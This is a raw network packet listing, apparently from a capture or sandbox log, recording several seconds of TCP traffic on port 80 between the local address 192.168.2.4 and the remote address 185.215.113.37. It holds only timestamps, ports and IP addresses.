Sep 26, 2024 18:27:06.301459074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301496983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301496983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301496983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301539898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301666975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301681995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301696062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301711082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301726103 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.301731110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301731110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301769972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301769972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.301769972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334357977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334400892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334417105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334494114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334507942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334506989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334522963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334525108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334537983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334553957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334556103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334578037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334611893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334638119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334652901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334666967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334681034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334681988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334697008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334717035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334729910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334769011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334783077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334796906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334811926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334825039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334844112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334889889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334903955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334917068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.334933996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.334955931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335000038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335015059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335030079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335042953 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335068941 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335091114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335104942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335133076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335140944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335156918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335169077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335176945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335200071 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335222960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335237980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335251093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335270882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335293055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.335444927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335460901 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.335503101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.350756884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.350797892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.350812912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.350861073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.350876093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.350886106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.350920916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.350935936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.350951910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.350980997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.351006031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387257099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387274981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387299061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387312889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387326956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387341976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387356997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387377024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387423992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387432098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387445927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387460947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387475014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387482882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387502909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387532949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387558937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387572050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387587070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387605906 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387630939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387645960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387689114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387702942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387717962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387731075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387732983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387748957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387764931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387778044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387809992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387854099 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387870073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387885094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387895107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387900114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387912035 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387916088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.387934923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387947083 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.387968063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388068914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388083935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388098001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388112068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388114929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388128996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388137102 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388144016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388160944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388189077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388257027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388271093 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388283968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388314962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388336897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388422012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388437033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388449907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388464928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388473034 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388483047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388495922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388498068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388510942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388519049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388528109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388547897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388573885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388679028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388693094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388706923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388722897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388724089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388740063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388762951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388806105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388819933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388833046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388854027 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388854980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388876915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388881922 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388891935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388906002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388910055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388921022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388935089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388937950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388947964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388962030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.388995886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.388995886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389051914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389234066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389247894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389261961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389276028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389286041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389291048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389305115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389312983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389323950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389326096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389332056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389343023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389370918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389394999 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389537096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389550924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389564037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389576912 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389590979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389591932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389605045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389620066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389621973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389636993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389647007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389651060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389666080 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389693975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389919043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389933109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389945984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389960051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389966011 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.389975071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389990091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.389997959 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.390005112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.390018940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.390032053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.390033960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.390044928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.390055895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.390078068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.390110016 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.422947884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423007011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423057079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423084974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423084974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423093081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423099995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423126936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423137903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423161030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423167944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423227072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423227072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423261881 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423275948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423293114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423310041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423345089 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423345089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423404932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423424006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423456907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423470020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423504114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423508883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423537970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423549891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423571110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423584938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423604965 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423624992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423650980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423652887 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423701048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423702002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423738956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423753023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423774004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423783064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423808098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.423821926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.423855066 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.439203024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.439382076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.715930939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.715991020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:06.720941067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.720972061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.720985889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.721009016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:06.721019983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:07.450522900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:07.450624943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:07.610656977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:07.610692978 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:07.615798950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:07.615818024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:07.615926981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:08.331505060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:08.331644058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:08.417061090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:08.422146082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:09.126981974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:09.127119064 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:10.057334900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:10.062324047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:10.781282902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:10.781363010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.189297915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.194344044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.407886028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.407917023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.407948971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.407967091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.407985926 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408009052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408010006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.408040047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408056021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408070087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408071995 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.408086061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408098936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408113003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408121109 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.408127069 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408147097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.408176899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.408193111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.408238888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.532819033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.532908916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.532943964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.532941103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.532977104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.532999039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.532999039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533032894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533050060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533066988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533082008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533099890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533113956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533133984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533153057 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533184052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533190966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533222914 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533243895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533256054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533273935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533308983 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533323050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533356905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:11.533380985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:11.533404112 CEST	49730	80	192.168.2.4	185.215.113.37
